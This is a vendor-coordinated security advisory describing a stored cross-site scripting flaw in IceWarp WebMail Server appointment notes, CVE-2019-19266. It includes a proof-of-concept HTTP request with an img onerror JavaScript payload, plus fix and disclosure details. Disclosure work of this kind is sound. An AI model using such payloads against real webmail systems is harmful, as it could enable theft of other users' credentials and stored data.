Share
Advisory: IceWarp: Cross-Site Scripting in Notes  
  
During a penetration test, RedTeam Pentesting discovered that the  
IceWarp WebMail Server is prone to cross-site scripting attacks in notes  
for objects. If attackers with access to the IceWarp system provide a  
manipulated object that is displayed by users, they can run arbitrary  
JavaScript code in the users' browsers.  
  
Details  
=======  
  
Product: IceWarp WebMail Server  
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well  
Fixed Versions: IceWarp 12.2.1.1  
Vulnerability Type: Cross-Site Scripting  
Security Risk: high  
Vendor URL: http://www.icewarp.com/  
Vendor Status: patch available  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-016  
Advisory Status: published  
CVE: CVE-2019-19266  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19266  
  
Introduction  
============  
  
"Secure professional email with own domain and revolutionary integration  
with chat. Shared calendars for perfect planning."  
(from the vendor's homepage)  
  
  
More Details  
============  
  
Users can create, modify and share appointments in IceWarp with other  
users of the web application. Especially noteworthy are the following  
two XML Entities in the request to create a new appointment:  
  
------------------------------------------------------------------------  
<evndescformat>text/html</evndescformat>  
<evnnote><h1;>RedTeam Pentesting</h1;></evnnote>  
------------------------------------------------------------------------  
  
These define a note for an appointment. It was found that in notes some  
HTML entities were rendered, but some entities and attributes were  
filtered. However, the filter only takes effect when the content type of  
the note is set to "text/html". When the content type is left out or set  
to any other type, the filter is not active, enabling attackers to  
circumvent the filter and execute JavaScript in the user's browser. The  
same is true for notes attached to other objects, such as files or  
tasks.  
  
Just using the calendar module, at least three ways to attack other  
IceWarp users are available using cross-site scripting in a note of an  
appointment:  
  
* Inviting other attendees to an appointment  
* Sharing access to an appointment  
* Sending a calendar file as a request via email  
  
Especially for the first variant of attacking an IceWarp user by adding  
that user to a manipulated appointment, no user interaction is required  
from the attacked user besides opening the IceWarp calendar.  
  
Proof of Concept  
================  
  
Create an appointment using an HTTP request similar to the following:  
  
------------------------------------------------------------------------  
POST /[...]/webmail/server/webmail.php HTTP/1.1  
Host: icewarp.example.com  
Content-Type: text/xml  
  
<iq sid="wm-XXXXXXXXXXXXXXXXXXXXXX" type="set">  
<query xmlns="webmail:iq:items">  
<account uid="testuser2@example.com">  
<folder uid="Calendar">  
<item action="add">  
<values>  
<evntitle>Example Appointment</evntitle>  
<meeting_action>0</meeting_action>  
<evnlocation></evnlocation>  
<evntype></evntype>  
<evnsharetype>U</evnsharetype>  
<evndescformat></evndescformat>  
<evnnote><img style="display: none;" src="x" onerror="alert('RedTeam Pentesting')"></evnnote>  
<evnflags>0</evnflags>  
<evntimeformat>Z</evntimeformat>  
<_tzevnstartdate>2458801</_tzevnstartdate>  
<_tzevnenddate>2458801</_tzevnenddate>  
<_tzevnstarttime>660</_tzevnstarttime>  
<_tzevnendtime>690</_tzevnendtime>  
<_tzid>Europe/Amsterdam</_tzid>  
<ctz>60</ctz>  
</values>  
</item>  
</folder>  
</account>  
</query>  
</iq>  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
None known.  
  
  
Fix  
===  
  
Update to IceWarp 12.2.1.1.  
  
  
Security Risk  
=============  
  
Attackers with access to an IceWarp account could give other legitimate  
IceWarp users access to manipulated objects. If the attacked user opens  
the preview of such an object, for example by just opening the calendar,  
a cross-site scripting vulnerability can be exploited. That could, for  
example, be used to display a fake login form and get access to the  
user's credentials, or to access any data stored in IceWarp such as  
emails, contacts, tasks, files or appointments. While this requires an  
attacker with access to an IceWarp account, this kind of access could be  
gained by exploiting the vulnerability described in rt-sa-2019-15 [1].  
This is considered to pose a high risk.  
  
  
Timeline  
========  
  
2019-11-11 Vulnerability identified  
2019-11-15 Vendor notified  
2019-11-22 Customer approved disclosure  
2019-11-25 CVE number requested  
2019-11-25 CVE number assigned  
2019-12-02 Vendor released fixed version  
2019-12-10 Customer approved disclosure  
2019-12-13 Fixed version released  
2020-01-02 Advisory released  
  
  
References  
==========  
  
[1] https://www.redteam-pentesting.de/advisories/rt-sa-2019-015  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://www.redteam-pentesting.de/jobs/  
  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen